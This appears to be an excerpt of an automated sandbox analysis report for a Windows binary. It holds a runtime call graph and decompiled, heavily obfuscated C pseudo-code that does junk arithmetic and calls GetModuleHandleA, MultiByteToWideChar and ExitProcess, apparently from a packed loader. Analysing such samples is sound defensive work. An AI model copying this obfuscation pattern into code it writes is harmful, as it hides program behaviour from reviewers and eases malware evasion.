___InternalCxxFrameHandler 10230 fbe617 10209->10230 10211 fbdaa9 pre_c_initialization 10236 fb9e41 10211->10236 10213 fbdab4 pre_c_initialization 10215 fc155e 10214->10215 10216 fc1581 10214->10216 10215->10216 10217 fb9826 __dosmaperr 20 API calls 10215->10217 10216->10199 10218 fc1571 10217->10218 10219 fb976a ___std_exception_copy 26 API calls 10218->10219 10220 fc157c 10219->10220 10220->10199 10222 fbe3ba 10221->10222 10225 fbe3bf ___scrt_initialize_onexit_tables 10221->10225 10223 fbdd8f ___scrt_fastfail 4 API calls 10222->10223 10222->10225 10224 fbe442 10223->10224 10225->10204 10243 fbe512 10226->10243 10229->10209 10309 fc16db 10230->10309 10232 fbe628 10233 fbe62f 10232->10233 10234 fbdd8f ___scrt_fastfail 4 API calls 10232->10234 10233->10211 10235 fbe637 10234->10235 10237 fb9c30 _abort 47 API calls 10236->10237 10238 fb9e4c 10237->10238 10239 fb9826 __dosmaperr 20 API calls 10238->10239 10242 fb9e84 10238->10242 10240 fb9e79 10239->10240 10241 fb976a ___std_exception_copy 26 API calls 10240->10241 10241->10242 10242->10213 10244 fbe52f 10243->10244 10245 fbe536 10243->10245 10249 fbd6ce 10244->10249 10252 fbd73e 10245->10252 10248 fbe534 10248->10206 10250 fbd73e __onexit 29 API calls 10249->10250 10251 fbd6e0 10250->10251 10251->10248 10255 fbd445 10252->10255 10258 fbd37b 10255->10258 10257 fbd469 10257->10248 10259 fbd387 ___scrt_is_nonwritable_in_current_image 10258->10259 10266 fbaf81 EnterCriticalSection 10259->10266 10261 fbd395 10267 fbd58d 10261->10267 10263 fbd3a2 10277 fbd3c0 10263->10277 10265 fbd3b3 ___scrt_is_nonwritable_in_current_image 10265->10257 10266->10261 10268 fbd5a3 try_get_function 10267->10268 10269 fbd5ab 10267->10269 10268->10263 10269->10268 10270 fbd604 10269->10270 10280 fbd91b 10269->10280 10270->10268 10272 fbd91b __onexit 29 API calls 10270->10272 10274 fbd61a 10272->10274 10273 fbd5fa 10275 fba6da _free 20 API calls 10273->10275 10276 fba6da _free 20 API calls 10274->10276 10275->10270 10276->10268 10308 fbafc9 LeaveCriticalSection 10277->10308 10279 fbd3ca 10279->10265 10282 fbd926 10280->10282 10281 fbd94e 10283 fbd95d 10281->10283 10289 fbd993 10281->10289 10282->10281 10284 fbd93f 10282->10284 10296 fbd9c6 10283->10296 10286 fb9826 __dosmaperr 20 API calls 10284->10286 10288 fbd944 ___scrt_get_show_window_mode 10286->10288 10288->10273 10290 fbd99e 10289->10290 10291 fbd9b3 HeapSize 10289->10291 10292 fb9826 __dosmaperr 20 API calls 10290->10292 10291->10283 10293 fbd9a3 10292->10293 10294 fb976a ___std_exception_copy 26 API calls 10293->10294 10295 fbd9ae 10294->10295 10295->10283 10297 fbd9de 10296->10297 10298 fbd9d3 10296->10298 10300 fbd9e6 10297->10300 10306 fbd9ef __dosmaperr 10297->10306 10299 fbbd19 __onexit 21 API calls 10298->10299 10304 fbd9db 10299->10304 10301 fba6da _free 20 API calls 10300->10301 10301->10304 10302 fbda19 HeapReAlloc 10302->10304 10302->10306 10303 fbd9f4 10305 fb9826 __dosmaperr 20 API calls 10303->10305 10304->10288 10305->10304 10306->10302 10306->10303 10307 fbc6ac __dosmaperr 7 API calls 10306->10307 10307->10306 10308->10279 10310 fc16f9 pre_c_initialization 10309->10310 10314 fc1719 pre_c_initialization 10309->10314 10311 fb9826 __dosmaperr 20 API calls 10310->10311 10312 fc170f 10311->10312 10313 fb976a ___std_exception_copy 26 API calls 10312->10313 10313->10314 10314->10232 10332 fb9b1b 10333 fb9b36 10332->10333 10334 fb9b26 10332->10334 10338 fb9b3c 10334->10338 10337 fba6da _free 20 API calls 10337->10333 10339 fb9b55 10338->10339 10340 fb9b4f 10338->10340 10342 fba6da _free 20 API calls 10339->10342 10341 fba6da _free 20 API calls 10340->10341 10341->10339 10343 fb9b61 10342->10343 10344 fba6da _free 20 API calls 10343->10344 10345 fb9b6c 10344->10345 10346 fba6da _free 20 API calls 10345->10346 10347 fb9b77 10346->10347 10348 fba6da _free 20 API calls 10347->10348 10349 fb9b82 10348->10349 10350 fba6da _free 20 API calls 10349->10350 10351 fb9b8d 10350->10351 10352 fba6da _free 20 API calls 10351->10352 10353 fb9b98 10352->10353 10354 fba6da _free 20 API calls 10353->10354 10355 fb9ba3 10354->10355 10356 fba6da _free 20 API calls 10355->10356 10357 fb9bae 10356->10357 10358 fba6da _free 20 API calls 10357->10358 10359 fb9bbc 10358->10359 10364 fb9a02 10359->10364 10370 fb990e 10364->10370 10366 fb9a26 10367 fb9a52 10366->10367 10383 fb996f 10367->10383 10369 fb9a76 10369->10337 10371 fb991a ___scrt_is_nonwritable_in_current_image 10370->10371 10378 fbaf81 EnterCriticalSection 10371->10378 10373 fb994e 10379 fb9963 10373->10379 10374 fb9924 10374->10373 10377 fba6da _free 20 API calls 10374->10377 10376 fb995b ___scrt_is_nonwritable_in_current_image 10376->10366 10377->10373 10378->10374 10382 fbafc9 LeaveCriticalSection 10379->10382 10381 fb996d 10381->10376 10382->10381 10384 fb997b ___scrt_is_nonwritable_in_current_image 10383->10384 10391 fbaf81 EnterCriticalSection 10384->10391 10386 fb9985 10387 fb9be5 __dosmaperr 20 API calls 10386->10387 10388 fb9998 10387->10388 10392 fb99ae 10388->10392 10390 fb99a6 ___scrt_is_nonwritable_in_current_image 10390->10369 10391->10386 10395 fbafc9 LeaveCriticalSection 10392->10395 10394 fb99b8 10394->10390 10395->10394

                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                      C-Code - Quality: 79%
                                                                                                                                                                                                                                                                      			E00FB1F80() {
                                                                                                                                                                                                                                                                      				intOrPtr _t287;
                                                                                                                                                                                                                                                                      				intOrPtr _t302;
                                                                                                                                                                                                                                                                      				intOrPtr _t303;
                                                                                                                                                                                                                                                                      				intOrPtr _t309;
                                                                                                                                                                                                                                                                      				intOrPtr _t322;
                                                                                                                                                                                                                                                                      				signed int _t325;
                                                                                                                                                                                                                                                                      				signed int _t327;
                                                                                                                                                                                                                                                                      				signed int _t344;
                                                                                                                                                                                                                                                                      				intOrPtr _t345;
                                                                                                                                                                                                                                                                      				intOrPtr _t348;
                                                                                                                                                                                                                                                                      				intOrPtr _t356;
                                                                                                                                                                                                                                                                      				signed int _t394;
                                                                                                                                                                                                                                                                      				signed int _t398;
                                                                                                                                                                                                                                                                      				intOrPtr _t402;
                                                                                                                                                                                                                                                                      				intOrPtr _t413;
                                                                                                                                                                                                                                                                      				signed int _t437;
                                                                                                                                                                                                                                                                      				intOrPtr _t452;
                                                                                                                                                                                                                                                                      				signed int _t458;
                                                                                                                                                                                                                                                                      				intOrPtr _t466;
                                                                                                                                                                                                                                                                      				intOrPtr _t468;
                                                                                                                                                                                                                                                                      				intOrPtr _t482;
                                                                                                                                                                                                                                                                      				intOrPtr _t486;
                                                                                                                                                                                                                                                                      				intOrPtr _t487;
                                                                                                                                                                                                                                                                      				intOrPtr _t519;
                                                                                                                                                                                                                                                                      				intOrPtr* _t520;
                                                                                                                                                                                                                                                                      				void* _t521;
                                                                                                                                                                                                                                                                      				void* _t522;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t520 = _t521 - 0x68;
                                                                                                                                                                                                                                                                      				_t522 = _t521 - 0xc0;
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_t520 + 0x64)) = 0x104d5f0;
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)( *((intOrPtr*)(_t520 + 0x64)) + 0xf8)) =  *((intOrPtr*)(_t520 + 0x78));
                                                                                                                                                                                                                                                                      				 *(_t520 + 0x58) = 0x2565;
                                                                                                                                                                                                                                                                      				 *(_t520 + 0x4c) = 0x24c7;
                                                                                                                                                                                                                                                                      				 *(_t520 + 0x5c) = 0x2506;
                                                                                                                                                                                                                                                                      				 *(_t520 + 0x60) = 0x2622;
                                                                                                                                                                                                                                                                      				 *(_t520 + 0x54) = 0x24c7;
                                                                                                                                                                                                                                                                      				 *(_t520 + 0x50) = 0x2565;
                                                                                                                                                                                                                                                                      				if( *(_t520 + 0x54) < ( *(_t520 + 0x50) ^ 0x00000347)) {
                                                                                                                                                                                                                                                                      					if( *(_t520 + 0x58) >  *(_t520 + 0x4c) + 0x161) {
                                                                                                                                                                                                                                                                      						__eflags =  *(_t520 + 0x58) - ( *(_t520 + 0x5c) ^  *( *((intOrPtr*)(_t520 + 0x64)) + 0xbadc71)) -  *( *((intOrPtr*)(_t520 + 0x64)) + 0xdc);
                                                                                                                                                                                                                                                                      						if(__eflags >= 0) {
                                                                                                                                                                                                                                                                      							__eflags =  *( *((intOrPtr*)(_t520 + 0x64)) + 0xdc) -  *(_t520 + 0x4c) *  *0x0104D694 *  *0x104d62c;
                                                                                                                                                                                                                                                                      							if(__eflags >= 0) {
                                                                                                                                                                                                                                                                      								 *(_t520 + 0x18) =  *(_t520 + 0x5c) *  *( *((intOrPtr*)(_t520 + 0x64)) + 0x8c);
                                                                                                                                                                                                                                                                      								GetModuleHandleA( *(_t520 + 0x18));
                                                                                                                                                                                                                                                                      								 *(_t520 + 4) =  *(_t520 + 0x60) -  *(_t520 + 0x60) ^ 0x00002801;
                                                                                                                                                                                                                                                                      								 *(_t520 + 8) =  *(_t520 + 0x5c) *  *( *((intOrPtr*)(_t520 + 0x64)) + 0xf4);
                                                                                                                                                                                                                                                                      								_t322 =  *0x104d5ec; // 0x104d5f0
                                                                                                                                                                                                                                                                      								 *(_t520 + 0xc) = ( *(_t520 + 0x60) | 0x000024c7) *  *(_t322 + 0xbadc81);
                                                                                                                                                                                                                                                                      								_t413 =  *0x104d5ec; // 0x104d5f0
                                                                                                                                                                                                                                                                      								 *((intOrPtr*)(_t520 + 0x10)) = _t413;
                                                                                                                                                                                                                                                                      								_t325 =  *( *((intOrPtr*)(_t520 + 0x64)) + 0x8c) &  *( *((intOrPtr*)(_t520 + 0x64)) + 0xbadbc1);
                                                                                                                                                                                                                                                                      								__eflags = _t325;
                                                                                                                                                                                                                                                                      								 *(_t520 + 0x14) = _t325;
                                                                                                                                                                                                                                                                      								_t327 = E00FC8570( *(_t520 + 4),  *(_t520 + 8),  *(_t520 + 0xc),  *((intOrPtr*)(_t520 + 0x10)),  *(_t520 + 0x14));
                                                                                                                                                                                                                                                                      								_t522 = _t522 + 0x14;
                                                                                                                                                                                                                                                                      								 *(_t520 + 0x5c) = _t327;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						 *(_t520 + 0x5c) =  *(_t520 + 0x5c) ^ 0x0000003d;
                                                                                                                                                                                                                                                                      						 *(_t520 + 0x4c) =  *(_t520 + 0x4c) ^ 0x000002ef;
                                                                                                                                                                                                                                                                      						 *(_t520 + 0x60) =  *(_t520 + 0x60) + 0x218;
                                                                                                                                                                                                                                                                      						 *(_t520 + 0x54) =  *(_t520 + 0x54) + 0x161;
                                                                                                                                                                                                                                                                      						 *(_t520 + 0x5c) =  *(_t520 + 0x5c) ^ 0x000002ad;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t520 + 0x34)) =  *(_t520 + 0x50) + 0x254;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t520 + 0x38)) =  *(_t520 + 0x58) - 0x2a;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t520 + 0x3c)) =  *(_t520 + 0x4c) - 0xc3;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t520 + 0x40)) =  *(_t520 + 0x58) + 0x2d5;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t520 + 0x44)) =  *((intOrPtr*)(_t520 + 0x64));
                                                                                                                                                                                                                                                                      						 *(_t520 + 0x48) =  *(_t520 + 0x54) ^ 0x000000af;
                                                                                                                                                                                                                                                                      						_push( *(_t520 + 0x48));
                                                                                                                                                                                                                                                                      						_push( *((intOrPtr*)(_t520 + 0x44)));
                                                                                                                                                                                                                                                                      						_push( *((intOrPtr*)(_t520 + 0x40)));
                                                                                                                                                                                                                                                                      						_push( *((intOrPtr*)(_t520 + 0x3c)));
                                                                                                                                                                                                                                                                      						_push( *((intOrPtr*)(_t520 + 0x38)));
                                                                                                                                                                                                                                                                      						_push( *((intOrPtr*)(_t520 + 0x34)));
                                                                                                                                                                                                                                                                      						 *(_t520 + 0x60) = E00FB3690();
                                                                                                                                                                                                                                                                      						 *(_t520 + 0x5c) =  *(_t520 + 0x5c) ^ 0x000001a5;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t520 + 0x1c)) =  *(_t520 + 0x60) - 0xbd;
                                                                                                                                                                                                                                                                      						 *(_t520 + 0x20) =  *(_t520 + 0x54) ^ 0x000003b0;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t520 + 0x24)) =  *(_t520 + 0x54) + 0xac;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t520 + 0x28)) =  *(_t520 + 0x5c) - 0x9b;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t520 + 0x2c)) =  *(_t520 + 0x58) - 0x5f;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t520 + 0x30)) =  *((intOrPtr*)(_t520 + 0x64));
                                                                                                                                                                                                                                                                      						_push( *((intOrPtr*)(_t520 + 0x30)));
                                                                                                                                                                                                                                                                      						_push( *((intOrPtr*)(_t520 + 0x2c)));
                                                                                                                                                                                                                                                                      						_push( *((intOrPtr*)(_t520 + 0x28)));
                                                                                                                                                                                                                                                                      						_push( *((intOrPtr*)(_t520 + 0x24)));
                                                                                                                                                                                                                                                                      						_push( *(_t520 + 0x20));
                                                                                                                                                                                                                                                                      						_push( *((intOrPtr*)(_t520 + 0x1c)));
                                                                                                                                                                                                                                                                      						_t344 = E00FB3E70();
                                                                                                                                                                                                                                                                      						_t522 = _t522 + 0x30;
                                                                                                                                                                                                                                                                      						 *(_t520 + 0x58) = _t344;
                                                                                                                                                                                                                                                                      						 *(_t520 + 0x54) =  *(_t520 + 0x54) - 0x161;
                                                                                                                                                                                                                                                                      						_t519 =  *0x104d5ec; // 0x104d5f0
                                                                                                                                                                                                                                                                      						_t345 =  *0x104d5ec; // 0x104d5f0
                                                                                                                                                                                                                                                                      						_t68 = _t345 + 0x94; // 0xea2000
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t519 + 0x90)) =  *_t68;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				if( *(_t520 + 0x54) > ( *(_t520 + 0x58) ^ 0x00000d01)) {
                                                                                                                                                                                                                                                                      					_t437 =  *0x104d628; // 0x1
                                                                                                                                                                                                                                                                      					 *(_t520 - 0x38) = _t437 &  *( *((intOrPtr*)(_t520 + 0x64)) + 0xac);
                                                                                                                                                                                                                                                                      					CloseHandle( *(_t520 - 0x38));
                                                                                                                                                                                                                                                                      					_t348 =  *0x104d5ec; // 0x104d5f0
                                                                                                                                                                                                                                                                      					_t202 = _t348 + 0xec; // 0xe608d
                                                                                                                                                                                                                                                                      					 *(_t520 + 0x50) =  *(_t520 + 0x50) -  *_t202 +  *((intOrPtr*)( *((intOrPtr*)(_t520 + 0x64)) + 0xb4));
                                                                                                                                                                                                                                                                      					 *(_t520 + 0x50) =  *(_t520 + 0x50) |  *( *((intOrPtr*)(_t520 + 0x64)) + 0xdc) *  *0x0104D694 -  *( *((intOrPtr*)(_t520 + 0x64)) + 0xe0);
                                                                                                                                                                                                                                                                      					GetCurrentProcessId();
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t520 - 0x40)) = 0x28ec;
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t520 - 0x3c)) = 0x3c28;
                                                                                                                                                                                                                                                                      					 *0x104df10 = E00FC5FF0(__eflags,  *((intOrPtr*)(_t520 - 0x40)),  *((intOrPtr*)(_t520 - 0x3c)));
                                                                                                                                                                                                                                                                      					 *(_t520 - 0x58) =  *(_t520 + 0x54) &  *0x01BFB1DD;
                                                                                                                                                                                                                                                                      					_t356 =  *0x104d5ec; // 0x104d5f0
                                                                                                                                                                                                                                                                      					_t222 = _t356 + 0xf4; // 0xd3256746
                                                                                                                                                                                                                                                                      					 *(_t520 - 0x54) =  *(_t520 + 0x60) +  *_t222;
                                                                                                                                                                                                                                                                      					 *(_t520 - 0x50) =  *(_t520 + 0x50) * 0x26e5 *  *(_t520 + 0x60);
                                                                                                                                                                                                                                                                      					 *(_t520 - 0x4c) =  *( *((intOrPtr*)(_t520 + 0x64)) + 0x14) ^ 0x000026d4;
                                                                                                                                                                                                                                                                      					 *(_t520 - 0x48) =  *(_t520 + 0x50) +  *((intOrPtr*)( *((intOrPtr*)(_t520 + 0x64)) + 0xa4)) |  *(_t520 + 0x54);
                                                                                                                                                                                                                                                                      					_t452 =  *0x104d5ec; // 0x104d5f0
                                                                                                                                                                                                                                                                      					_t238 = _t452 + 0xb4; // 0x0
                                                                                                                                                                                                                                                                      					 *(_t520 - 0x44) =  *_t238 *  *( *((intOrPtr*)(_t520 + 0x64)) + 0xf4);
                                                                                                                                                                                                                                                                      					MultiByteToWideChar( *(_t520 - 0x58),  *(_t520 - 0x54),  *(_t520 - 0x50),  *(_t520 - 0x4c),  *(_t520 - 0x48),  *(_t520 - 0x44));
                                                                                                                                                                                                                                                                      					_t458 =  *(_t520 + 0x5c) | ( *( *((intOrPtr*)(_t520 + 0x64)) + 0xbadc51) &  *0x104d6cc) - 0x000027b9;
                                                                                                                                                                                                                                                                      					__eflags = _t458;
                                                                                                                                                                                                                                                                      					 *(_t520 + 0x5c) = _t458;
                                                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                                                      					 *(_t520 + 0x58) =  *(_t520 + 0x58) - 0x39;
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t520 - 0x18)) =  *((intOrPtr*)(_t520 + 0x64));
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t520 - 0x14)) =  *(_t520 + 0x60) + 6;
                                                                                                                                                                                                                                                                      					 *(_t520 - 0x10) =  *(_t520 + 0x60) ^ 0x000003ba;
                                                                                                                                                                                                                                                                      					 *(_t520 - 0xc) =  *(_t520 + 0x5c) ^ 0x0000001b;
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t520 - 8)) =  *(_t520 + 0x58) - 0x2c6;
                                                                                                                                                                                                                                                                      					 *(_t520 - 4) =  *(_t520 + 0x4c);
                                                                                                                                                                                                                                                                      					 *_t520 =  *(_t520 + 0x50) + 0x16f;
                                                                                                                                                                                                                                                                      					 *(_t520 + 0x60) = E00FC55C0( *((intOrPtr*)(_t520 - 0x18)),  *((intOrPtr*)(_t520 - 0x14)),  *(_t520 - 0x10),  *(_t520 - 0xc),  *((intOrPtr*)(_t520 - 8)),  *(_t520 - 4),  *_t520);
                                                                                                                                                                                                                                                                      					 *(_t520 + 0x58) =  *(_t520 + 0x58) - 0x2c6;
                                                                                                                                                                                                                                                                      					_t466 =  *0x104d69c; // 0x1a0e74
                                                                                                                                                                                                                                                                      					_t287 =  *0x104d5ec; // 0x104d5f0
                                                                                                                                                                                                                                                                      					_t136 = _t287 + 0x58; // 0xc4ec4ec5
                                                                                                                                                                                                                                                                      					_t468 =  *0x104d5ec; // 0x104d5f0
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t468 + 0x58)) =  *_t136 - _t466 - 0x1a0ed5;
                                                                                                                                                                                                                                                                      					 *(_t520 + 0x54) =  *(_t520 + 0x54) ^ 0x000002f4;
                                                                                                                                                                                                                                                                      					 *(_t520 + 0x60) =  *(_t520 + 0x60) - 0x3b;
                                                                                                                                                                                                                                                                      					 *(_t520 + 0x50) =  *(_t520 + 0x50) - 0x5f;
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t520 - 0x34)) =  *(_t520 + 0x58) + 0xf8;
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t520 - 0x30)) =  *(_t520 + 0x4c) - 0x90;
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t520 - 0x2c)) =  *(_t520 + 0x5c) - 0xb;
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t520 - 0x28)) =  *(_t520 + 0x60) + 0x254;
                                                                                                                                                                                                                                                                      					 *(_t520 - 0x24) =  *(_t520 + 0x58) ^ 0x000003de;
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t520 - 0x20)) =  *(_t520 + 0x54) - 0x93;
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t520 - 0x1c)) =  *((intOrPtr*)(_t520 + 0x64));
                                                                                                                                                                                                                                                                      					 *(_t520 + 0x5c) = E00FC7440( *((intOrPtr*)(_t520 - 0x34)),  *((intOrPtr*)(_t520 - 0x30)),  *((intOrPtr*)(_t520 - 0x2c)),  *((intOrPtr*)(_t520 - 0x28)),  *(_t520 - 0x24),  *((intOrPtr*)(_t520 - 0x20)),  *((intOrPtr*)(_t520 - 0x1c)));
                                                                                                                                                                                                                                                                      					 *(_t520 + 0x4c) =  *(_t520 + 0x4c) + 0xac;
                                                                                                                                                                                                                                                                      					 *(_t520 + 0x60) =  *(_t520 + 0x60) + 0xbd;
                                                                                                                                                                                                                                                                      					if( *((intOrPtr*)( *((intOrPtr*)(_t520 + 0x64)) + 0x38)) >=  *( *((intOrPtr*)(_t520 + 0x64)) + 0x14)) {
                                                                                                                                                                                                                                                                      						_t302 =  *0x104d5ec; // 0x104d5f0
                                                                                                                                                                                                                                                                      						_t178 = _t302 + 0xdc; // 0x8
                                                                                                                                                                                                                                                                      						_t303 =  *0x104d5ec; // 0x104d5f0
                                                                                                                                                                                                                                                                      						_t394 =  *_t178 +  *((intOrPtr*)(_t303 + 0x74)) ^  *0x104d6d0 ^  *( *((intOrPtr*)(_t520 + 0x64)) + 0xe0);
                                                                                                                                                                                                                                                                      						__eflags = _t394;
                                                                                                                                                                                                                                                                      						 *( *((intOrPtr*)(_t520 + 0x64)) + 0xe0) = _t394;
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						_t487 =  *0x104d5ec; // 0x104d5f0
                                                                                                                                                                                                                                                                      						_t176 = _t487 + 0x94; // 0xea2000
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)( *((intOrPtr*)(_t520 + 0x64)) + 0x64)) =  *_t176;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					_t482 =  *0x104d5ec; // 0x104d5f0
                                                                                                                                                                                                                                                                      					_t187 = _t482 + 0xec; // 0xe608d
                                                                                                                                                                                                                                                                      					if( *((intOrPtr*)( *((intOrPtr*)(_t520 + 0x64)) + 0x9c)) <=  *_t187) {
                                                                                                                                                                                                                                                                      						_t398 = ( *( *((intOrPtr*)(_t520 + 0x64)) + 0xac) +  *((intOrPtr*)( *((intOrPtr*)(_t520 + 0x64)) + 0xbadbdd))) *  *0x104d67c;
                                                                                                                                                                                                                                                                      						__eflags = _t398;
                                                                                                                                                                                                                                                                      						 *0x104d67c = _t398;
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						_t486 =  *0x104d6d8; // 0x104d5f0
                                                                                                                                                                                                                                                                      						_t309 =  *0x104d654(_t486,  *((intOrPtr*)( *((intOrPtr*)(_t520 + 0x64)) + 0x90)) +  *0x104d6e0,  *((intOrPtr*)( *((intOrPtr*)(_t520 + 0x64)) + 0xf8)));
                                                                                                                                                                                                                                                                      						_t402 =  *0x104d5ec; // 0x104d5f0
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t402 + 0xc0)) = _t309;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				ExitProcess( *( *((intOrPtr*)(_t520 + 0x64)) + 0xc0));
                                                                                                                                                                                                                                                                      			}






























                                                                                                                                                                                                                                                                      0x00fb1f81
                                                                                                                                                                                                                                                                      0x00fb1f85
                                                                                                                                                                                                                                                                      0x00fb1f8b
                                                                                                                                                                                                                                                                      0x00fb1f98
                                                                                                                                                                                                                                                                      0x00fb1f9e
                                                                                                                                                                                                                                                                      0x00fb1fa5
                                                                                                                                                                                                                                                                      0x00fb1fac
                                                                                                                                                                                                                                                                      0x00fb1fb3
                                                                                                                                                                                                                                                                      0x00fb1fba
                                                                                                                                                                                                                                                                      0x00fb1fc1
                                                                                                                                                                                                                                                                      0x00fb1fd4
                                                                                                                                                                                                                                                                      0x00fb1fe5
                                                                                                                                                                                                                                                                      0x00fb2134
                                                                                                                                                                                                                                                                      0x00fb2137
                                                                                                                                                                                                                                                                      0x00fb2159
                                                                                                                                                                                                                                                                      0x00fb215f
                                                                                                                                                                                                                                                                      0x00fb2172
                                                                                                                                                                                                                                                                      0x00fb2179
                                                                                                                                                                                                                                                                      0x00fb218b
                                                                                                                                                                                                                                                                      0x00fb219b
                                                                                                                                                                                                                                                                      0x00fb21af
                                                                                                                                                                                                                                                                      0x00fb21bc
                                                                                                                                                                                                                                                                      0x00fb21bf
                                                                                                                                                                                                                                                                      0x00fb21c5
                                                                                                                                                                                                                                                                      0x00fb21dc
                                                                                                                                                                                                                                                                      0x00fb21dc
                                                                                                                                                                                                                                                                      0x00fb21e0
                                                                                                                                                                                                                                                                      0x00fb21f7
                                                                                                                                                                                                                                                                      0x00fb21fc
                                                                                                                                                                                                                                                                      0x00fb21ff
                                                                                                                                                                                                                                                                      0x00fb21ff
                                                                                                                                                                                                                                                                      0x00fb215f
                                                                                                                                                                                                                                                                      0x00fb1feb
                                                                                                                                                                                                                                                                      0x00fb1ff1
                                                                                                                                                                                                                                                                      0x00fb1ffd
                                                                                                                                                                                                                                                                      0x00fb2008
                                                                                                                                                                                                                                                                      0x00fb2014
                                                                                                                                                                                                                                                                      0x00fb2020
                                                                                                                                                                                                                                                                      0x00fb202b
                                                                                                                                                                                                                                                                      0x00fb2034
                                                                                                                                                                                                                                                                      0x00fb2040
                                                                                                                                                                                                                                                                      0x00fb204b
                                                                                                                                                                                                                                                                      0x00fb2051
                                                                                                                                                                                                                                                                      0x00fb205d
                                                                                                                                                                                                                                                                      0x00fb2063
                                                                                                                                                                                                                                                                      0x00fb2067
                                                                                                                                                                                                                                                                      0x00fb206b
                                                                                                                                                                                                                                                                      0x00fb206f
                                                                                                                                                                                                                                                                      0x00fb2073
                                                                                                                                                                                                                                                                      0x00fb2077
                                                                                                                                                                                                                                                                      0x00fb2080
                                                                                                                                                                                                                                                                      0x00fb208b
                                                                                                                                                                                                                                                                      0x00fb2097
                                                                                                                                                                                                                                                                      0x00fb20a3
                                                                                                                                                                                                                                                                      0x00fb20ae
                                                                                                                                                                                                                                                                      0x00fb20ba
                                                                                                                                                                                                                                                                      0x00fb20c3
                                                                                                                                                                                                                                                                      0x00fb20c9
                                                                                                                                                                                                                                                                      0x00fb20cf
                                                                                                                                                                                                                                                                      0x00fb20d3
                                                                                                                                                                                                                                                                      0x00fb20d7
                                                                                                                                                                                                                                                                      0x00fb20db
                                                                                                                                                                                                                                                                      0x00fb20df
                                                                                                                                                                                                                                                                      0x00fb20e3
                                                                                                                                                                                                                                                                      0x00fb20e4
                                                                                                                                                                                                                                                                      0x00fb20e9
                                                                                                                                                                                                                                                                      0x00fb20ec
                                                                                                                                                                                                                                                                      0x00fb20f8
                                                                                                                                                                                                                                                                      0x00fb20fb
                                                                                                                                                                                                                                                                      0x00fb2101
                                                                                                                                                                                                                                                                      0x00fb2106
                                                                                                                                                                                                                                                                      0x00fb210c
                                                                                                                                                                                                                                                                      0x00fb210c
                                                                                                                                                                                                                                                                      0x00fb1fe5
                                                                                                                                                                                                                                                                      0x00fb220d
                                                                                                                                                                                                                                                                      0x00fb242b
                                                                                                                                                                                                                                                                      0x00fb2437
                                                                                                                                                                                                                                                                      0x00fb243e
                                                                                                                                                                                                                                                                      0x00fb2444
                                                                                                                                                                                                                                                                      0x00fb244a
                                                                                                                                                                                                                                                                      0x00fb245e
                                                                                                                                                                                                                                                                      0x00fb2487
                                                                                                                                                                                                                                                                      0x00fb248a
                                                                                                                                                                                                                                                                      0x00fb2490
                                                                                                                                                                                                                                                                      0x00fb2497
                                                                                                                                                                                                                                                                      0x00fb24ae
                                                                                                                                                                                                                                                                      0x00fb24c3
                                                                                                                                                                                                                                                                      0x00fb24c9
                                                                                                                                                                                                                                                                      0x00fb24cf
                                                                                                                                                                                                                                                                      0x00fb24d5
                                                                                                                                                                                                                                                                      0x00fb24e3
                                                                                                                                                                                                                                                                      0x00fb24fa
                                                                                                                                                                                                                                                                      0x00fb2515
                                                                                                                                                                                                                                                                      0x00fb2518
                                                                                                                                                                                                                                                                      0x00fb2521
                                                                                                                                                                                                                                                                      0x00fb252e
                                                                                                                                                                                                                                                                      0x00fb2549
                                                                                                                                                                                                                                                                      0x00fb2570
                                                                                                                                                                                                                                                                      0x00fb2570
                                                                                                                                                                                                                                                                      0x00fb2572
                                                                                                                                                                                                                                                                      0x00fb2213
                                                                                                                                                                                                                                                                      0x00fb2219
                                                                                                                                                                                                                                                                      0x00fb221f
                                                                                                                                                                                                                                                                      0x00fb2228
                                                                                                                                                                                                                                                                      0x00fb2234
                                                                                                                                                                                                                                                                      0x00fb223d
                                                                                                                                                                                                                                                                      0x00fb2248
                                                                                                                                                                                                                                                                      0x00fb224e
                                                                                                                                                                                                                                                                      0x00fb225a
                                                                                                                                                                                                                                                                      0x00fb2281
                                                                                                                                                                                                                                                                      0x00fb228d
                                                                                                                                                                                                                                                                      0x00fb2290
                                                                                                                                                                                                                                                                      0x00fb229c
                                                                                                                                                                                                                                                                      0x00fb22a1
